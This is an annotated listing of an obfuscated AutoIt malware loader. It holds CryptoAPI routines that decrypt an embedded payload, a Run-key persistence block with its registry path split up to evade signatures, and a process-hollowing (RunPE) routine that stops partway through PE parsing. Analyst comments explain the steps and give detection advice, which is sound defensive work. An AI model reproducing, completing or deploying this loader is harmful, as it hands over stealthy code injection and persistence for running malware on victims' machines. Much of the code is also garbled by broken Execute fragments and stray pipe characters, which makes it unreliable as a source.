Created
August 2, 2012 05:56
; Script-wide switch and constants. $SU is compared with "1" before the Run-key
; write later in this listing; with the value "0" set here that branch is skipped.
; NOTE(review): the `Execute(...")` fragments and the trailing " | |" on every line are
; not AutoIt syntax; they look like decompiler and page-extraction residue, so this
; listing will not run as shown.
$SU = "0" | |
#Region | |
; Build directives: no UPX packing, and run with the invoker's privileges (no elevation request).
#AutoIt3Wrapper_UseUpx=n | |
#AutoIt3Wrapper_res_requestedExecutionLevel=asInvoker | |
#EndRegion | |
; Provider type and flags handed to CryptAcquireContext in _1(): $140 normally, $137 on
; WIN_2000, with $139 as the flags. 1 / 24 / -268435456 are the values of PROV_RSA_FULL /
; PROV_RSA_AES / CRYPT_VERIFYCONTEXT (0xF0000000 read as a signed 32-bit number).
Global Const $137 = 1 | |
Global Const $140 = 24 | |
Global Const $139 = -268435456 | |
; Parameter ids passed to CryptGetHashParam in _7(): 4 = HP_HASHSIZE, 2 = HP_HASHVAL.
Global Const $105 = 4 | |
Global Const $106 = 2 | |
; Flag arguments: $133 goes to CryptDeriveKey in _3(), $134 to CryptHashData in _3() and _7().
Global Const $133 = 1 | |
Global Const $134 = 1 | |
; Windows CryptoAPI algorithm identifiers (ALG_ID values) for hashes and ciphers.
Global Const $CALG_MD2 = 32769 | |
Global Const $CALG_MD4 = 32770 | |
; $136 is the default hash algorithm of _3(); 32771 (0x8003) is the value of CALG_MD5.
Global Const $136 = 32771 | |
Global Const $CALG_SHA1 = 32772 | |
Global Const $CALG_3DES = 26115 | |
Global Const $CALG_AES_128 = 26126 | |
Global Const $CALG_AES_192 = 26127 | |
Global Const $CALG_AES22_256 = 26128 | |
Global Const $CALG_DES = 26113 | |
; 26114 is the value the main script passes to _6() as the algorithm.
Global Const $CALG_RC2 = 26114 | |
Global Const $CALG_RC4 = 26625 | |
; Sentinel, not a real algorithm: when a caller passes it, _5/_6/_9/_DEC23 treat the key
; argument as an existing key handle and skip key derivation.
Global Const $CALG_USERKEY = 4660 | |
; Shared state read and written by the accessor functions near the end of the crypto
; section: [0] = reference count, [1] = Advapi32.dll handle, [2] = crypto context handle.
Global $102[3] | |
; Reference-counted start-up of the CryptoAPI state kept in $102.
; On the first call (count = 0) it opens Advapi32.dll, stores the handle, and calls
; CryptAcquireContext with provider type $140 ($137 on WIN_2000) and flags $139; the
; returned context handle is stored. Every successful call increments the count.
; Returns True; on failure returns False with @error = 1 (DllOpen) or 2 (CryptAcquireContext).
; NOTE(review): structure matches _Crypt_Startup from AutoIt's Crypt.au3 UDF with the
; identifiers renamed - presumably obfuscation; confirm against the UDF.
Func _1() | |
If _VER233462BRTBTR() = 0 Then | |
Local $101 = DllOpen("Advapi32.dll") | |
If @error Then Return SetError(1, 0, False) | |
Execute(__FU32xx1223523fdsdfsSet($101)")) | |
Local $103 | |
Local $138 = $140 | |
If @OSVersion = "WIN_2000" Then $138 = $137 | |
$103 = Execute( DllCall(__FU32xx1223523fdsdfs(), "bool", "CryptAcquireContext", "handle*", 0, "ptr", 0, "ptr", 0, "dword", $138, "dword", $139)")) | |
If @error Or Not $103[0] Then | |
; Acquire failed: close the DLL again so no handle is left open.
Execute(DllClose(__FU32xx1223523fdsdfs())")) | |
Return SetError(2, 0, False) | |
Else | |
; $103[1] is the "handle*" out-parameter, i.e. the acquired context.
Execute(__ergherg3485235236Set($103[1])")) | |
EndIf | |
EndIf | |
Execute(_ver233462brtbtrInc()")) | |
Return True | |
EndFunc | |
; Counterpart of _1(): decrements the reference count and, once it reaches 0, releases
; the crypto context with CryptReleaseContext and closes the Advapi32.dll handle.
; Return values of the two calls are not checked.
Func _2() | |
_VER233462BRTBTRDEC() | |
If _VER233462BRTBTR() = 0 Then | |
DllCall(__FU32XX1223523FDSDFS(), "bool", "CryptReleaseContext", "handle", __ERGHERG3485235236(), "dword", 0) | |
DllClose(__FU32XX1223523FDSDFS()) | |
EndIf | |
EndFunc | |
; Derives a session key from a password.
;   $131 - password / key material, hashed as raw bytes
;   $109 - ALG_ID of the cipher the key is for
;   $132 - ALG_ID of the hash used for derivation (default $136 = 32771)
; Steps: CryptCreateHash -> CryptHashData over $131 -> CryptDeriveKey with flag $133.
; Returns the key handle ($103[5] of CryptDeriveKey) with @error = 0, or -1 with
; @error = 1 (create hash), 2 (hash data) or 3 (derive key).
; The _1() reference taken here is not released in this function; _4() calls _2() when
; the key is destroyed, which balances it.
; NOTE(review): a key derived from a single unsalted hash of a string embedded in the
; script gives no confidentiality against anyone holding the script; for an analyst it
; means the protected data can be recovered offline from the strings in the sample.
Func _3($131, $109, $132 = $136) | |
Local $103 | |
Local $104 | |
Local $107 | |
Local $118 | |
Local $115 | |
Execute(_1()")) | |
; Do ... Until True is a single-pass block so ExitLoop can act as "goto cleanup".
Do | |
$103 = DllCall(__FU32XX1223523FDSDFS(), "bool", "CryptCreateHash", "handle", __ERGHERG3485235236(), "uint", $132, "ptr", 0, "dword", 0, "handle*", 0) | |
If @error Or Not $103[0] Then | |
$118 = Execute( 1")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
$104 = Execute( $103[5]")) | |
; Copy the password into a byte buffer sized to its binary length.
$107 = Execute( DllStructCreate("byte[" & BinaryLen($131) & "]")")) | |
Execute(DllStructSetData($107, 1, $131)")) | |
$103 = Execute( DllCall(__FU32xx1223523fdsdfs(), "bool", "CryptHashData", "handle", $104, "struct*", $107, "dword", DllStructGetSize($107), "dword", $134)")) | |
If @error Or Not $103[0] Then | |
$118 = Execute( 2")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
$103 = DllCall(__FU32XX1223523FDSDFS(), "bool", "CryptDeriveKey", "handle", __ERGHERG3485235236(), "uint", $109, "handle", $104, "dword", $133, "handle*", 0) | |
If @error Or Not $103[0] Then | |
$118 = Execute( 3")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
$118 = Execute( 0")) | |
$115 = Execute( $103[5]")) | |
Until True | |
; The hash object is only needed for derivation; destroy it on every exit path.
If $104 <> 0 Then DllCall(__FU32XX1223523FDSDFS(), "bool", "CryptDestroyHash", "handle", $104) | |
Return SetError($118, 0, $115) | |
EndFunc | |
; Destroys the key handle $129 with CryptDestroyKey and then drops one reference via _2().
; Returns True with @error = 0 on success, False with @error = 1 if the call failed.
Func _4($129) | |
Local $103 = DllCall(__FU32XX1223523FDSDFS(), "bool", "CryptDestroyKey", "handle", $129) | |
; Capture @error before _2() runs, because the next call would overwrite it.
Local $130 = @error | |
Execute(_2()")) | |
If $130 Or Not $103[0] Then | |
Return SetError(1, 0, False) | |
Else | |
Return SetError(0, 0, True) | |
EndIf | |
EndFunc | |
; Encrypts a buffer with CryptEncrypt.
;   $108 - data to encrypt
;   $110 - password, or an existing key handle when $109 = $CALG_USERKEY
;   $109 - cipher ALG_ID, or $CALG_USERKEY
;   $125 - passed as the "Final" argument of CryptEncrypt (last block of a stream)
; Returns the encrypted bytes with @error = 0, or -1 with @error = 1 (key derivation),
; 2 (size query) or 3 (encryption).
Func _5($108, $110, $109, $125 = True) | |
Local $107 | |
Local $118 | |
Local $115 | |
Local $135 | |
Local $103 | |
Execute(_1()")) | |
Do | |
If $109 <> $CALG_USERKEY Then | |
; Password given: replace it with a derived key handle.
$110 = _3($110, $109) | |
If @error Then | |
$118 = Execute( 1")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
EndIf | |
; First call passes a null buffer; the required output size comes back in $103[6].
$103 = DllCall(__FU32XX1223523FDSDFS(), "bool", "CryptEncrypt", "handle", $110, "handle", 0, "bool", $125, "dword", 0, "ptr", 0, "dword*", BinaryLen($108), "dword", 0) | |
If @error Or Not $103[0] Then | |
$118 = Execute( 2")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
$135 = Execute( $103[6]")) | |
$107 = Execute( DllStructCreate("byte[" & $135 & "]")")) | |
Execute(DllStructSetData($107, 1, $108)")) | |
; Second call encrypts in place inside the buffer allocated above.
$103 = DllCall(__FU32XX1223523FDSDFS(), "bool", "CryptEncrypt", "handle", $110, "handle", 0, "bool", $125, "dword", 0, "struct*", $107, "dword*", BinaryLen($108), "dword", DllStructGetSize($107)) | |
If @error Or Not $103[0] Then | |
$118 = Execute( 3")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
$118 = Execute( 0")) | |
$115 = Execute( DllStructGetData($107, 1)")) | |
Until True | |
; Only destroy the key when this function derived it; a caller-supplied handle is left alone.
If $109 <> $CALG_USERKEY Then _4($110) | |
_2() | |
Return SetError($118, 0, $115) | |
EndFunc | |
; Decrypts a buffer with CryptDecrypt. This is the routine the main script uses to
; recover the embedded payload before handing it to _PNP23().
;   $108 - encrypted data
;   $110 - password, or an existing key handle when $109 = $CALG_USERKEY
;   $109 - cipher ALG_ID, or $CALG_USERKEY
;   $125 - passed as the "Final" argument of CryptDecrypt
; Returns the decrypted bytes with @error = 0, or -1 with @error = 1 (key derivation)
; or 2 (decryption).
Func _6($108, $110, $109, $125 = True) | |
Local $107 | |
Local $118 | |
Local $115 | |
Local $127 | |
Local $128 | |
Local $103 | |
Execute(_1()")) | |
Do | |
If $109 <> $CALG_USERKEY Then | |
$110 = _3($110, $109) | |
If @error Then | |
$118 = Execute( 1")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
EndIf | |
; Working buffer is the input length plus 1000 spare bytes.
$107 = Execute( DllStructCreate("byte[" & BinaryLen($108) + 1000 & "]")")) | |
Execute(DllStructSetData($107, 1, $108)")) | |
$103 = Execute( DllCall(__FU32xx1223523fdsdfs(), "bool", "CryptDecrypt", "handle", $110, "handle", 0, "bool", $125, "dword", 0, "struct*", $107, "dword*", BinaryLen($108))")) | |
If @error Or Not $103[0] Then | |
$118 = Execute( 2")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
; $103[6] is the in/out length: the plaintext size after decryption.
$128 = Execute( $103[6]")) | |
; Overlay a struct of exactly that size on the same memory to trim the result.
$127 = Execute( DllStructCreate("byte[" & $128 & "]", DllStructGetPtr($107))")) | |
$118 = Execute( 0")) | |
$115 = Execute( DllStructGetData($127, 1)")) | |
Until True | |
If $109 <> $CALG_USERKEY Then _4($110) | |
_2() | |
Return SetError($118, 0, $115) | |
EndFunc | |
; Hashes a buffer, optionally as one step of a multi-part hash.
;   $108 - data to add to the hash
;   $109 - hash ALG_ID (used only when a new hash object is created)
;   $125 - True: finish and return the digest bytes; False: return the hash handle so
;          the caller can feed more data
;   $104 - existing hash handle to continue, or 0 to create a new one
; Returns the digest or the handle; on failure -1 with @error = 1 (create), 2 (hash
; data), 3 (query digest size) or 4 (read digest).
; NOTE(review): on the $125 = False success path $118 is never assigned before
; SetError($118, ...) - callers that test @error depend on how AutoIt treats the
; unset value; confirm.
Func _7($108, $109, $125 = True, $104 = 0) | |
Local $118 | |
Local $115 = 0 | |
Local $126 | |
Local $103 | |
Local $107 = 0 | |
Execute(_1()")) | |
Do | |
If $104 = 0 Then | |
$103 = DllCall(__FU32XX1223523FDSDFS(), "bool", "CryptCreateHash", "handle", __ERGHERG3485235236(), "uint", $109, "ptr", 0, "dword", 0, "handle*", 0) | |
If @error Or Not $103[0] Then | |
$118 = Execute( 1")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
$104 = Execute( $103[5]")) | |
EndIf | |
$107 = Execute( DllStructCreate("byte[" & BinaryLen($108) & "]")")) | |
Execute(DllStructSetData($107, 1, $108)")) | |
$103 = Execute( DllCall(__FU32xx1223523fdsdfs(), "bool", "CryptHashData", "handle", $104, "struct*", $107, "dword", DllStructGetSize($107), "dword", $134)")) | |
If @error Or Not $103[0] Then | |
$118 = Execute( 2")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
If $125 Then | |
; Query with parameter id $105: the digest length is returned in $103[3].
$103 = Execute( DllCall(__FU32xx1223523fdsdfs(), "bool", "CryptGetHashParam", "handle", $104, "dword", $105, "dword*", 0, "dword*", 4, "dword", 0)")) | |
If @error Or Not $103[0] Then | |
$118 = Execute( 3")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
$126 = Execute( $103[3]")) | |
$107 = Execute( DllStructCreate("byte[" & $126 & "]")")) | |
; Query with parameter id $106 copies the digest into the new buffer.
$103 = Execute( DllCall(__FU32xx1223523fdsdfs(), "bool", "CryptGetHashParam", "handle", $104, "dword", $106, "struct*", $107, "dword*", DllStructGetSize($107), "dword", 0)")) | |
If @error Or Not $103[0] Then | |
$118 = Execute( 4")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
$118 = Execute( 0")) | |
$115 = Execute( DllStructGetData($107, 1)")) | |
Else | |
$115 = Execute( $104")) | |
EndIf | |
Until True | |
; The hash object is destroyed only when finishing; otherwise the caller owns the handle.
If $104 <> 0 And $125 Then DllCall(__FU32XX1223523FDSDFS(), "bool", "CryptDestroyHash", "handle", $104) | |
Execute(_2()")) | |
Return SetError($118, 0, $115) | |
EndFunc | |
; Hashes the file $124 with algorithm $109 by feeding it to _7() in 512 KiB reads.
; Returns the digest, or -1 with @error = 1 (open failed), 2 (final hash step failed)
; or 3 (intermediate hash step failed).
; Not called anywhere else in this listing.
; NOTE(review): $118 is not assigned on the success path before SetError($118, ...);
; confirm how callers interpret @error in that case.
Func _8($124, $109) | |
Local $122 | |
Local $118, $115 | |
Local $123 = 0 | |
Local $111 | |
Execute(_1()")) | |
Do | |
; Mode 16 opens the file for binary reading.
$122 = Execute( FileOpen($124, 16)")) | |
If $122 = -1 Then | |
$118 = Execute( 1")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
Do | |
$111 = Execute( FileRead($122, 512 * 1024)")) | |
If @error Then | |
; FileRead reported an error (e.g. end of file): finish the hash and leave both loops.
$115 = _7($111, $109, True, $123) | |
If @error Then | |
$115 = Execute( -1")) | |
$118 = Execute( 2")) | |
ExitLoop 2 | |
EndIf | |
ExitLoop 2 | |
Else | |
; More data to come: keep the running hash handle in $123.
$123 = _7($111, $109, False, $123) | |
If @error Then | |
$115 = Execute( -1")) | |
$118 = Execute( 3")) | |
ExitLoop 2 | |
EndIf | |
EndIf | |
Until False | |
Until True | |
Execute(_2()")) | |
If $122 <> -1 Then FileClose($122) | |
Return SetError($118, 0, $115) | |
EndFunc | |
; Encrypts file $121 into file $120 in 1 MiB chunks via _5().
;   $110 - password, or key handle when $109 = $CALG_USERKEY
;   $109 - cipher ALG_ID, or $CALG_USERKEY
; Returns True with @error = 0, or -1 with @error = 1 (key derivation), 2 (open source),
; 3 (open destination), 4 (final chunk failed) or 5 (intermediate chunk failed).
; Not called anywhere else in this listing.
; NOTE(review): on a final-chunk failure (@error 4) the -1 returned by _5() is still
; written to the destination file before the loop exits.
Func _9($121, $120, $110, $109) | |
Local $114, $112 | |
Local $118 = 0, $115 = True | |
Local $111 | |
Local $117 = FileGetSize($121) | |
Local $IREAD = 0 | |
Execute(_1()")) | |
Do | |
If $109 <> $CALG_USERKEY Then | |
$110 = _3($110, $109) | |
If @error Then | |
$118 = Execute( 1")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
EndIf | |
; 16 = binary read; 26 = 16 + 8 + 2 (binary, create directories, overwrite).
$114 = Execute( FileOpen($121, 16)")) | |
If @error Then | |
$118 = Execute( 2")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
$112 = Execute( FileOpen($120, 26)")) | |
If @error Then | |
$118 = Execute( 3")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
Do | |
$111 = Execute( FileRead($114, 1024 * 1024)")) | |
$IREAD += Execute( BinaryLen($111)")) | |
; The last chunk is detected by the running byte count reaching the file size;
; only that chunk is encrypted with Final = True.
If $IREAD = $117 Then | |
$111 = _5($111, $110, $CALG_USERKEY, True) | |
If @error Then | |
$118 = Execute( 4")) | |
$115 = Execute( -1")) | |
EndIf | |
Execute(FileWrite($112, $111)")) | |
ExitLoop 2 | |
Else | |
$111 = _5($111, $110, $CALG_USERKEY, False) | |
If @error Then | |
$118 = Execute( 5")) | |
$115 = Execute( -1")) | |
ExitLoop 2 | |
EndIf | |
Execute(FileWrite($112, $111)")) | |
EndIf | |
Until False | |
Until True | |
If $109 <> $CALG_USERKEY Then _4($110) | |
_2() | |
If $114 <> -1 Then FileClose($114) | |
If $112 <> -1 Then FileClose($112) | |
Return SetError($118, 0, $115) | |
EndFunc | |
; Decrypts file $119 into file $12 in 1 MiB chunks via _6(); mirror image of _9().
;   $113 - password, or key handle when $116 = $CALG_USERKEY
;   $116 - cipher ALG_ID, or $CALG_USERKEY
; Returns True with @error = 0, or -1 with @error = 1 (key derivation), 2 (open source),
; 3 (open destination), 4 (final chunk failed) or 5 (intermediate chunk failed).
; Not called anywhere else in this listing; the main script decrypts in memory with _6().
Func _DEC23($119, $12, $113, $116) | |
Local $114, $112 | |
Local $118 = 0, $115 = True | |
Local $111 | |
Local $117 = FileGetSize($119) | |
Local $IREAD = 0 | |
Execute(_1()")) | |
Do | |
If $116 <> $CALG_USERKEY Then | |
$113 = _3($113, $116) | |
If @error Then | |
$118 = Execute( 1")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
EndIf | |
; 16 = binary read; 26 = 16 + 8 + 2 (binary, create directories, overwrite).
$114 = Execute( FileOpen($119, 16)")) | |
If @error Then | |
$118 = Execute( 2")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
$112 = Execute( FileOpen($12, 26)")) | |
If @error Then | |
$118 = Execute( 3")) | |
$115 = Execute( -1")) | |
ExitLoop | |
EndIf | |
Do | |
$111 = Execute( FileRead($114, 1024 * 1024)")) | |
$IREAD += Execute( BinaryLen($111)")) | |
; Last chunk (byte count equals file size) is decrypted with Final = True.
If $IREAD = $117 Then | |
$111 = _6($111, $113, $CALG_USERKEY, True) | |
If @error Then | |
$118 = Execute( 4")) | |
$115 = Execute( -1")) | |
EndIf | |
Execute(FileWrite($112, $111)")) | |
ExitLoop 2 | |
Else | |
$111 = _6($111, $113, $CALG_USERKEY, False) | |
If @error Then | |
$118 = Execute( 5")) | |
$115 = Execute( -1")) | |
ExitLoop 2 | |
EndIf | |
Execute(FileWrite($112, $111)")) | |
EndIf | |
Until False | |
Until True | |
If $116 <> $CALG_USERKEY Then _4($113) | |
_2() | |
If $114 <> -1 Then FileClose($114) | |
If $112 <> -1 Then FileClose($112) | |
Return SetError($118, 0, $115) | |
EndFunc | |
; Returns the crypto reference count stored in $102[0].
Func _VER233462BRTBTR() | |
Return $102[0] | |
EndFunc | |
; Increments the crypto reference count in $102[0]; called at the end of _1().
Func _VER233462BRTBTRINC() | |
$102[0] += 1 | |
EndFunc | |
; Decrements the crypto reference count in $102[0], never going below 0.
Func _VER233462BRTBTRDEC() | |
If $102[0] > 0 Then $102[0] -= 1 | |
EndFunc | |
; Returns the Advapi32.dll handle stored in $102[1]; used as the DLL argument of every
; Crypt* DllCall in this listing.
Func __FU32XX1223523FDSDFS() | |
Return $102[1] | |
EndFunc | |
; Stores the DLL handle $101 in $102[1]; called from _1() after DllOpen.
Func __FU32XX1223523FDSDFSSET($101) | |
$102[1] = $101 | |
EndFunc | |
; Returns the crypto context handle stored in $102[2].
Func __ERGHERG3485235236() | |
Return $102[2] | |
EndFunc | |
; Optional persistence, enabled only when $SU = "1" (it is "0" at the top of this listing).
; The registry path is assembled from three string fragments; concatenated they read
; HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. The value name is the
; script's file name and the data is its full path, so the program would be started at
; each logon of the current user (MITRE ATT&CK T1547.001).
; NOTE(review): splitting the key path across variables presumably exists to defeat
; static string matching, so signatures on the whole path will miss it. Behavioural
; detection is unaffected: registry auditing or EDR sees the final RegWrite target, and
; a new per-user Run value pointing into a user-writable directory is worth alerting on.
If $SU = "1" Then | |
$POXX = Execute( "SER\SOFTWARE\Microsoft\Windows\Current"")) | |
$KRABBYPATTY69 = Execute( "HKEY_CURRENT_U" & $POXX & "Version\Run"")) | |
Execute(RegWrite($KRABBYPATTY69, @ScriptName, "REG_SZ", @ScriptFullPath)")) | |
EndIf | |
; Stores the crypto context handle in $102[2]; called from _1() after CryptAcquireContext.
Func __ERGHERG3485235236SET($HCRYPTCONTEXT) | |
$102[2] = $HCRYPTCONTEXT | |
EndFunc | |
; Analyst summary: runs a PE image from memory inside a newly created process instead of
; from a file on disk. The visible API sequence is the pattern catalogued as process
; hollowing (MITRE ATT&CK T1055.012).
;   $1 - bytes of the PE image to run (the main script passes the decrypted "no.edu" data)
;   $2 - command line for the new process
;   $3 - executable used as the host process (default @AutoItExe, i.e. this program itself)
; Returns the new process id, or 0 with @error set:
;   1 CreateProcessW failed          2 64-bit caller but child is WOW64
;   3 GetThreadContext failed        4 image lacks "MZ"
;   5 image lacks PE signature       6 optional-header magic does not match caller bitness
;   7 writing the image failed       8 reading the child's PEB failed
;   9 writing the child's PEB failed 10 SetThreadContext failed
;   11 ResumeThread failed           101 no memory could be allocated in the child
;   102 @AutoItX64 set but @OSArch is not "X64"
; On every failure after process creation the child is terminated.
; Detection notes: the sequence CreateProcessW with creation flags 4, cross-process
; VirtualAllocEx with protection 64, optional NtUnmapViewOfSection, WriteProcessMemory,
; SetThreadContext and ResumeThread is visible to EDR API telemetry; afterwards the
; child's in-memory image no longer matches the file it was started from, which memory
; forensics can check.
Func _PNP23($1, $2 = "", $3 = @AutoItExe) | |
Local $4 = @AutoItX64 | |
; Copy the image into a local byte buffer; $7 is a moving parse pointer into it.
Local $5 = Binary($1) | |
Local $6 = DllStructCreate("byte[" & BinaryLen($5) & "]") | |
Execute(DllStructSetData($6, 1, $5)")) | |
Local $7 = DllStructGetPtr($6) | |
; $8 and $9 are passed as the startup-info and process-information arguments.
Local $8 = DllStructCreate("dword cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "word ShowWindow;" & "word Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError") | |
Local $9 = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId") | |
; Creation flags value 4 is CREATE_SUSPENDED: the child exists but has not run yet.
Local $10 = DllCall("kernel32.dll", "bool", "CreateProcessW", "wstr", $3, "wstr", $2, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($8), "ptr", DllStructGetPtr($9)) | |
If @error Or Not $10[0] Then Return SetError(1, 0, 0) | |
Local $11 = DllStructGetData($9, "Process") | |
Local $12 = DllStructGetData($9, "Thread") | |
If $4 And _FVSDHUWEUGWEUIGHW325235235C($11) Then | |
DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0) | |
Return SetError(2, 0, 0) | |
EndIf | |
; $13 selects the register layout: 1 = 32-bit, 2 = 64-bit, 3 = unsupported (aborts).
Local $13, $14 | |
If $4 Then | |
If @OSArch = "X64" Then | |
$13 = Execute( 2")) | |
$14 = DllStructCreate("align 16; uint64 P1Home; uint64 P2Home; uint64 P3Home; uint64 P4Home; uint64 P5Home; uint64 P6Home;" & "dword ContextFlags; dword MxCsr;" & "word SegCS; word SegDs; word SegEs; word SegFs; word SegGs; word SegSs; dword EFlags;" & "uint64 Dr0; uint64 Dr1; uint64 Dr2; uint64 Dr3; uint64 Dr6; uint64 Dr7;" & "uint64 Rax; uint64 Rcx; uint64 Rdx; uint64 Rbx; uint64 Rsp; uint64 Rbp; uint64 Rsi; uint64 Rdi; uint64 R8; uint64 R9; uint64 R10; uint64 R11; uint64 R12; uint64 R13; uint64 R14; uint64 R15;" & "uint64 Rip;" & "uint64 Header[4]; uint64 Legacy[16]; uint64 Xmm0[2]; uint64 Xmm1[2]; uint64 Xmm2[2]; uint64 Xmm3[2]; uint64 Xmm4[2]; uint64 Xmm5[2]; uint64 Xmm6[2]; uint64 Xmm7[2]; uint64 Xmm8[2]; uint64 Xmm9[2]; uint64 Xmm10[2]; uint64 Xmm11[2]; uint64 Xmm12[2]; uint64 Xmm13[2]; uint64 Xmm14[2]; uint64 Xmm15[2];" & "uint64 VectorRegister[52]; uint64 VectorControl;" & "uint64 DebugControl; uint64 LastBranchToRip; uint64 LastBranchFromRip; uint64 LastExceptionToRip; uint64 LastExceptionFromRip") | |
Else | |
$13 = Execute( 3")) | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(102, 0, 0) | |
EndIf | |
Else | |
$13 = Execute( 1")) | |
$14 = DllStructCreate("dword ContextFlags;" & "dword Dr0; dword Dr1; dword Dr2; dword Dr3; dword Dr6; dword Dr7;" & "dword ControlWord; dword StatusWord; dword TagWord; dword ErrorOffset; dword ErrorSelector; dword DataOffset; dword DataSelector; byte RegisterArea[80]; dword Cr0NpxState;" & "dword SegGs; dword SegFs; dword SegEs; dword SegDs;" & "dword Edi; dword Esi; dword Ebx; dword Edx; dword Ecx; dword Eax;" & "dword Ebp; dword Eip; dword SegCs; dword EFlags; dword Esp; dword SegSs;" & "byte ExtendedRegisters[512]") | |
EndIf | |
Local $15 | |
Switch $13 | |
Case 1 | |
$15 = Execute( 0x10007")) | |
Case 2 | |
$15 = Execute( 0x100007")) | |
Case 3 | |
$15 = Execute( 0x80027")) | |
EndSwitch | |
Execute(DllStructSetData($14, "ContextFlags", $15)")) | |
; Read the suspended main thread's initial register state.
$10 = DllCall("kernel32.dll", "bool", "GetThreadContext", "handle", $12, "ptr", DllStructGetPtr($14)) | |
If @error Or Not $10[0] Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(3, 0, 0) | |
EndIf | |
; $16 (Ebx / Rdx of the initial context) is used below as the address from which a
; PEB-shaped structure is read, i.e. it is treated as the child's PEB address.
Local $16 | |
Switch $13 | |
Case 1 | |
$16 = Execute( DllStructGetData($14, "Ebx")")) | |
Case 2 | |
$16 = Execute( DllStructGetData($14, "Rdx")")) | |
Case 3 | |
EndSwitch | |
; --- Parse the supplied image: DOS header, PE signature, file header, optional header.
Local $17 = DllStructCreate("char Magic[2];" & "word BytesOnLastPage;" & "word Pages;" & "word Relocations;" & "word SizeofHeader;" & "word MinimumExtra;" & "word MaximumExtra;" & "word SS;" & "word SP;" & "word Checksum;" & "word IP;" & "word CS;" & "word Relocation;" & "word Overlay;" & "char Reserved[8];" & "word OEMIdentifier;" & "word OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $7) | |
Local $18 = $7 | |
$7 += Execute( DllStructGetData($17, "AddressOfNewExeHeader")")) | |
Local $19 = DllStructGetData($17, "Magic") | |
If Not ($19 == "MZ") Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(4, 0, 0) | |
EndIf | |
Local $20 = DllStructCreate("dword Signature", $7) | |
$7 += Execute( 4")) | |
; 17744 = 0x4550, the bytes "PE\0\0".
If DllStructGetData($20, "Signature") <> 17744 Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(5, 0, 0) | |
EndIf | |
Local $21 = DllStructCreate("word Machine;" & "word NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "word SizeOfOptionalHeader;" & "word Characteristics", $7) | |
Local $22 = DllStructGetData($21, "NumberOfSections") | |
$7 += Execute( 20")) | |
Local $23 = DllStructCreate("word Magic;", $7) | |
Local $25 = DllStructGetData($23, 1) | |
Local $24 | |
; 267 = 0x10B (PE32) requires a 32-bit caller; 523 = 0x20B (PE32+) requires a 64-bit caller.
If $25 = 267 Then | |
If $4 Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(6, 0, 0) | |
EndIf | |
$24 = DllStructCreate("word Magic;" & "byte MajorLinkerVersion;" & "byte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "word MajorOperatingSystemVersion;" & "word MinorOperatingSystemVersion;" & "word MajorImageVersion;" & "word MinorImageVersion;" & "word MajorSubsystemVersion;" & "word MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "word Subsystem;" & "word DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $7) | |
$7 += Execute( 96")) | |
ElseIf $25 = 523 Then | |
If Not $4 Then | |
Execute(DllCall("kernel32.dll", "bool", "TerminateProcess", "handle", $11, "dword", 0)")) | |
Return SetError(6, 0, 0) | |
EndIf | |
